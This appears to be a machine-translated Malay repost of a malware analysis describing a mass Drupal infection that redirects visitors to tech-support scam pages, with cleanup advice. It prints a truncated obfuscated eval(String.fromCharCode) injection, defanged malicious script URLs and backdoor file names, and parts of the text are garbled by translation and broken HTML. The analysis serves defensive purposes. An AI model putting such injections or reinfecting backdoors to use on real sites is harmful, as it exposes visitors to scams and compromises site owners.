Penyebaran kawasan setempat yang besar [.] tk Drupal Infection

            

Selepas beberapa siri kritikal Drupal kelemahan didedahkan musim bunga ini, tidak menghairankan untuk melihat lonjakan jangkitan Drupal besar seperti ini:

… dengan lebih dari seribu tapak yang dikompromi yang mengalihkan pelawat ke halaman "penipuan Tech".

Suntikan Berbahaya

Halaman yang dijangkiti mengandungi kod JavaScript yang berikut, yang disuntik ke dalam pelbagai .ttml.php .html.twig dan .js

 eval (String .fromCharCode (118, 97, 114, 32, 122, 32, 61, 32, 100, 111, 99, 117, 109, 101, 110, ... skipped ... 100, 40, 122, 41, 59)); 

Kod menyuntik skrip jauh dari hxxps: //js.localstorage [.] tk / s.js? Crt = new yang bertanggungjawab untuk pengalihan berniat jahat

Skrip ini juga disuntik ke dalam pelbagai lokasi dalam pangkalan data dalam teks biasa:

  

Sebagai alternatif, skrip boleh dimuat dari hxxp: //193.201.224 .233 / m.js? D = 3 .

Perubahan ini juga boleh didapati di beberapa laman web WordPress.

Reinfections

Mengalih keluar kod JavaScript berniat jahat dari fail yang dijangkiti dan pangkalan data tidak mencukupi. Hacker juga membuat beberapa fail yang kerap memeriksa sama ada ia mengandungi kod berniat jahat dan memperbaikinya jika kod tidak dijumpai. Fail ini mempunyai nama fail rawak seperti " g.php ", " tonure.php ", " jooner.php ", " ", dan lain-lain

Berikut ialah kod mereka yang mencari .tpl.php .html.twig header.php, dan drupal.js fail dan kemudian menyuntikkan JavaScript yang berniat jahat ke dalamnya.

 Injector Malware "width =" 632 "height =" 583 "/> </p>
<p> Seperti yang anda perhatikan, ia cuba menyuntik malware ke dalam fail bermula dari tiga tingkat direktori di atas fail semasa (<strong> ../../.. </strong>). Ini bermakna kod ini boleh menjangkiti semua laman web <a href= jiran yang berkongsi akaun pelayan yang sama dengan laman web semasa.

Mitigasi

Untuk membersihkan jangkitan ini, seseorang perlu memasang dan menaik taraf Drupal sepenuhnya (dari jawatan ini, sekurang-kurangnya ke Drupal 7.59, Drupal 8.5.3, atau Drupal 8.4.8, bergantung kepada cawangan yang anda gunakan). Seterusnya, anda perlu mencari dan mengalih keluar semua backdoors (jangan lupa untuk memeriksa kerja cron yang berniat jahat), dan kemudian keluarkan malware yang disuntik dari fail dan pangkalan data Drupal yang dijangkiti.

Percubaan untuk membuang jangkitan dalam susunan yang berbeza boleh menyebabkan pembasmian semula sebelum anda menyelesaikan pembersihan. Anda boleh mendapatkan arahan langkah demi langkah lengkap dalam panduan kami Bagaimana untuk membersihkan Laman Web Drupal yang diretas .

Menggunakan firewall laman web yang secara proaktif menepati laman web anda terhadap ancaman baru akan membantu jika anda tidak memantau berita tentang kelemahan yang ditemui atau tidak dapat menambal tapak anda sebaik sahaja patch dikeluarkan

            



Sumber

Bacaan WordPress Yang Lebih Menarik!

Game Addict – Clan War Gaming Theme
Themeforest,
Themeforest,

Game Addict – Clan War Gaming Theme

Pembuat Rojak - May 28, 2018

Penagih Permainan - Melepaskan semangat anda. Permainan Addict adalah tema untuk puak-puak dan permainan. Ia membolehkan anda dapat membuat dan…

Dapatkan Pakej Layout Pejabat Doktor Percuma & Bersih untuk Divi
Elegant Themes,
3 views
Elegant Themes,
3 views

Dapatkan Pakej Layout Pejabat Doktor Percuma & Bersih untuk Divi

Pembuat Rojak - May 27, 2018

Hey Divi Nation! Terima kasih kerana menyertai kami untuk ansuran seterusnya Inisiatif Rekaan Divi mingguan kami; di mana setiap minggu,…

Leave a Comment

Your email address will not be published.